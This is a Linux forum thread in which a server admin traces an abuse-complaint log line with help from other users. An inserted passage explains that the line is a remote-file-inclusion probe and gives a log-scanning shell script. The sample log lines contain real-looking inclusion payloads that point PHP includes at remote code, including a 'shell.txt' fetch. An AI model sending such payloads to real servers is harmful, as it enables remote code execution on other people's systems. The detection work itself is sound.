LinuxQuestions.org

LinuxQuestions.org (/questions/)
-   Linux - Security (https://www.linuxquestions.org/questions/linux-security-4/)
-   -   newbie log checking question (https://www.linuxquestions.org/questions/linux-security-4/newbie-log-checking-question-578991/)

tv1 08-22-2007 01:01 PM

newbie log checking question
 
What logs, or how do I check, to see who or what domain caused this:

[21/Aug/2007:00:29:23 +0000] "GET /viewforum.php?f=10//lib.inc.php?pm_path=http://marketingpower.ifrance.com/.z.txt?? HTTP/1.1" 403 487 "-" "libwww-perl/5.808" (malwarecomplaints.info) "-"

thanks

reverse 08-22-2007 01:18 PM

Where did you get that from, if I'm not too indiscreet?

sir-lancealot 08-22-2007 01:18 PM

I don't think this is a 'security forum post', but a lot depends on how your Apache logs are set up, which you can see in your httpd.conf file. If they are set up normally, you could do it a number of ways, such as:
grep -F 'viewforum.php?f=10' /var/log/httpd/*

That will show every place that string appears, along with which file it is in, so try that and report back.

tv1 08-22-2007 01:45 PM

Quote:

Originally Posted by reverse (Post 2867099)
Where did you get that from, if I'm not too indiscreet?

An abuse complaint filed against my server.

tv1 08-22-2007 01:49 PM

Quote:

Originally Posted by sir-lancealot (Post 2867100)
I don't think this is a 'security forum post', but a lot depends on how your Apache logs are set up, which you can see in your httpd.conf file. If they are set up normally, you could do it a number of ways, such as:
grep -F 'viewforum.php?f=10' /var/log/httpd/*

That will show every place that string appears, along with which file it is in, so try that and report back.

That directory (/var/log/httpd) is empty.

tv1 08-22-2007 01:51 PM

Just to add, in the hope of mercy from all here, that prior to getting into Linux servers recently I was quite a Windows guru, but I am seeing the light . . . . .

unSpawn 08-23-2007 04:19 AM

Locate your webserver's config. The default name for Apache is "httpd.conf". Grep that file: 'grep -i '^[a-z].*log/*/' httpd.conf'. If that doesn't yield anything, then it may be configured to log in some subdirectory of what is configured with the "ServerRoot" directive in "httpd.conf". If nothing works, another way is to find the PID of the running webserver: 'pgrep -l -f /httpd', then list the files it has open for writing: 'lsof -w -n -p INSERTPIDONEHERE -a -d w,0-10'. Hopefully you'll see something called "access_log" or similar.

Next time please put log lines between BB code tags for enhanced readability. If I'm looking at that (malformed) log line, I'm thinking this is one of those inclusion tricks. Make an inventory of what applications your webserver actually serves (besides that forum), check each for updates and install those, or uninstall the application. Also look at mod_security.
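
The log line in the complaint is a remote-file-inclusion (RFI) probe: a URL is stuffed into a query parameter (pm_path=http://...) in the hope that a PHP include() on the server fetches and executes it. The "who" is the client address in the first field of the access log and the "what domain" is the host inside that parameter. The following script, added here as an example and not taken from the thread, scans Apache combined-format log lines for requests whose parameter values are themselves URLs. The log lines in it are constructed for the example (RFC 5737 documentation addresses); the function and variable names are the example's own.

```shell
#!/bin/sh
# Added example: flag remote-file-inclusion probes in an Apache access log.
# Assumes combined log format. Sample lines below are constructed; the first
# mirrors the request quoted in the complaint.
SAMPLE_LOG='192.0.2.10 - - [21/Aug/2007:00:29:23 +0000] "GET /viewforum.php?f=10//lib.inc.php?pm_path=http://marketingpower.ifrance.com/.z.txt?? HTTP/1.1" 403 487 "-" "libwww-perl/5.808"
198.51.100.7 - - [21/Aug/2007:00:30:01 +0000] "GET /viewforum.php?f=10 HTTP/1.1" 200 15230 "-" "Mozilla/5.0"
203.0.113.5 - - [21/Aug/2007:00:31:44 +0000] "GET /index.php?page=ftp://203.0.113.5/shell.txt? HTTP/1.1" 200 3120 "-" "libwww-perl/5.805"'

# rfi_hits FILE: one line per suspicious request, as
#   "<client_ip> <status> <param> <remote_host> <remote_url>"
# A parameter counts as suspicious when its value is itself an http/https/ftp URL.
rfi_hits() {
    awk '
    {
        # Combined format: $1 client, $7 request target, $9 status.
        # Split the target on "?" and "&" instead of parsing one query string:
        # the injected parameter often sits behind a second "?" because the
        # attacker appended it to a path that already carried a query, and the
        # trailing "??" padding then falls out as empty segments.
        n = split($7, seg, /[?&]/)
        for (i = 2; i <= n; i++) {
            eq = index(seg[i], "=")
            if (eq == 0) continue
            key = substr(seg[i], 1, eq - 1)
            val = substr(seg[i], eq + 1)
            if (val ~ /^(https?|ftp):\/\//) {
                host = val
                sub(/^[a-z]+:\/\//, "", host)   # drop the scheme
                sub(/[\/:].*$/, "", host)        # drop path and port
                print $1, $9, key, host, val
            }
        }
    }' "$1"
}

# rfi_hosts FILE: distinct remote hosts the payloads were fetched from,
# i.e. the domains to report or to block on egress from the web server.
rfi_hosts() {
    rfi_hits "$1" | awk '{ print $4 }' | sort -u
}

# Stand-alone run over the constructed sample. On a real server point the
# functions at the access log located via httpd.conf, e.g.
#   rfi_hits /var/log/httpd/access_log
tmp=$(mktemp)
printf '%s\n' "$SAMPLE_LOG" > "$tmp"
rfi_hits "$tmp"
rfi_hosts "$tmp"
rm -f "$tmp"
```

The 403 on the first sample line means the server refused the request, but the second hit returned 200 to a libwww-perl client, which is the case that deserves a look at the script named in the path. The trailing "??" the attacker appends turns whatever the vulnerable script adds after the parameter into a query string on the remote URL, so it is a reliable marker of a scripted RFI scanner rather than a typo.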

tv1 08-23-2007 11:34 AM

Quote:

Originally Posted by unSpawn (Post 2867799)
Locate your webserver's config. The default name for Apache is "httpd.conf". Grep that file: 'grep -i '^[a-z].*log/*/' httpd.conf'. If that doesn't yield anything, then it may be configured to log in some subdirectory of what is configured with the "ServerRoot" directive in "httpd.conf". If nothing works, another way is to find the PID of the running webserver: 'pgrep -l -f /httpd', then list the files it has open for writing: 'lsof -w -n -p INSERTPIDONEHERE -a -d w,0-10'. Hopefully you'll see something called "access_log" or similar.

Next time please put log lines between BB code tags for enhanced readability. If I'm looking at that (malformed) log line, I'm thinking this is one of those inclusion tricks. Make an inventory of what applications your webserver actually serves (besides that forum), check each for updates and install those, or uninstall the application. Also look at mod_security.

Thanks, got it! And thanks for the patience.


All times are GMT -5.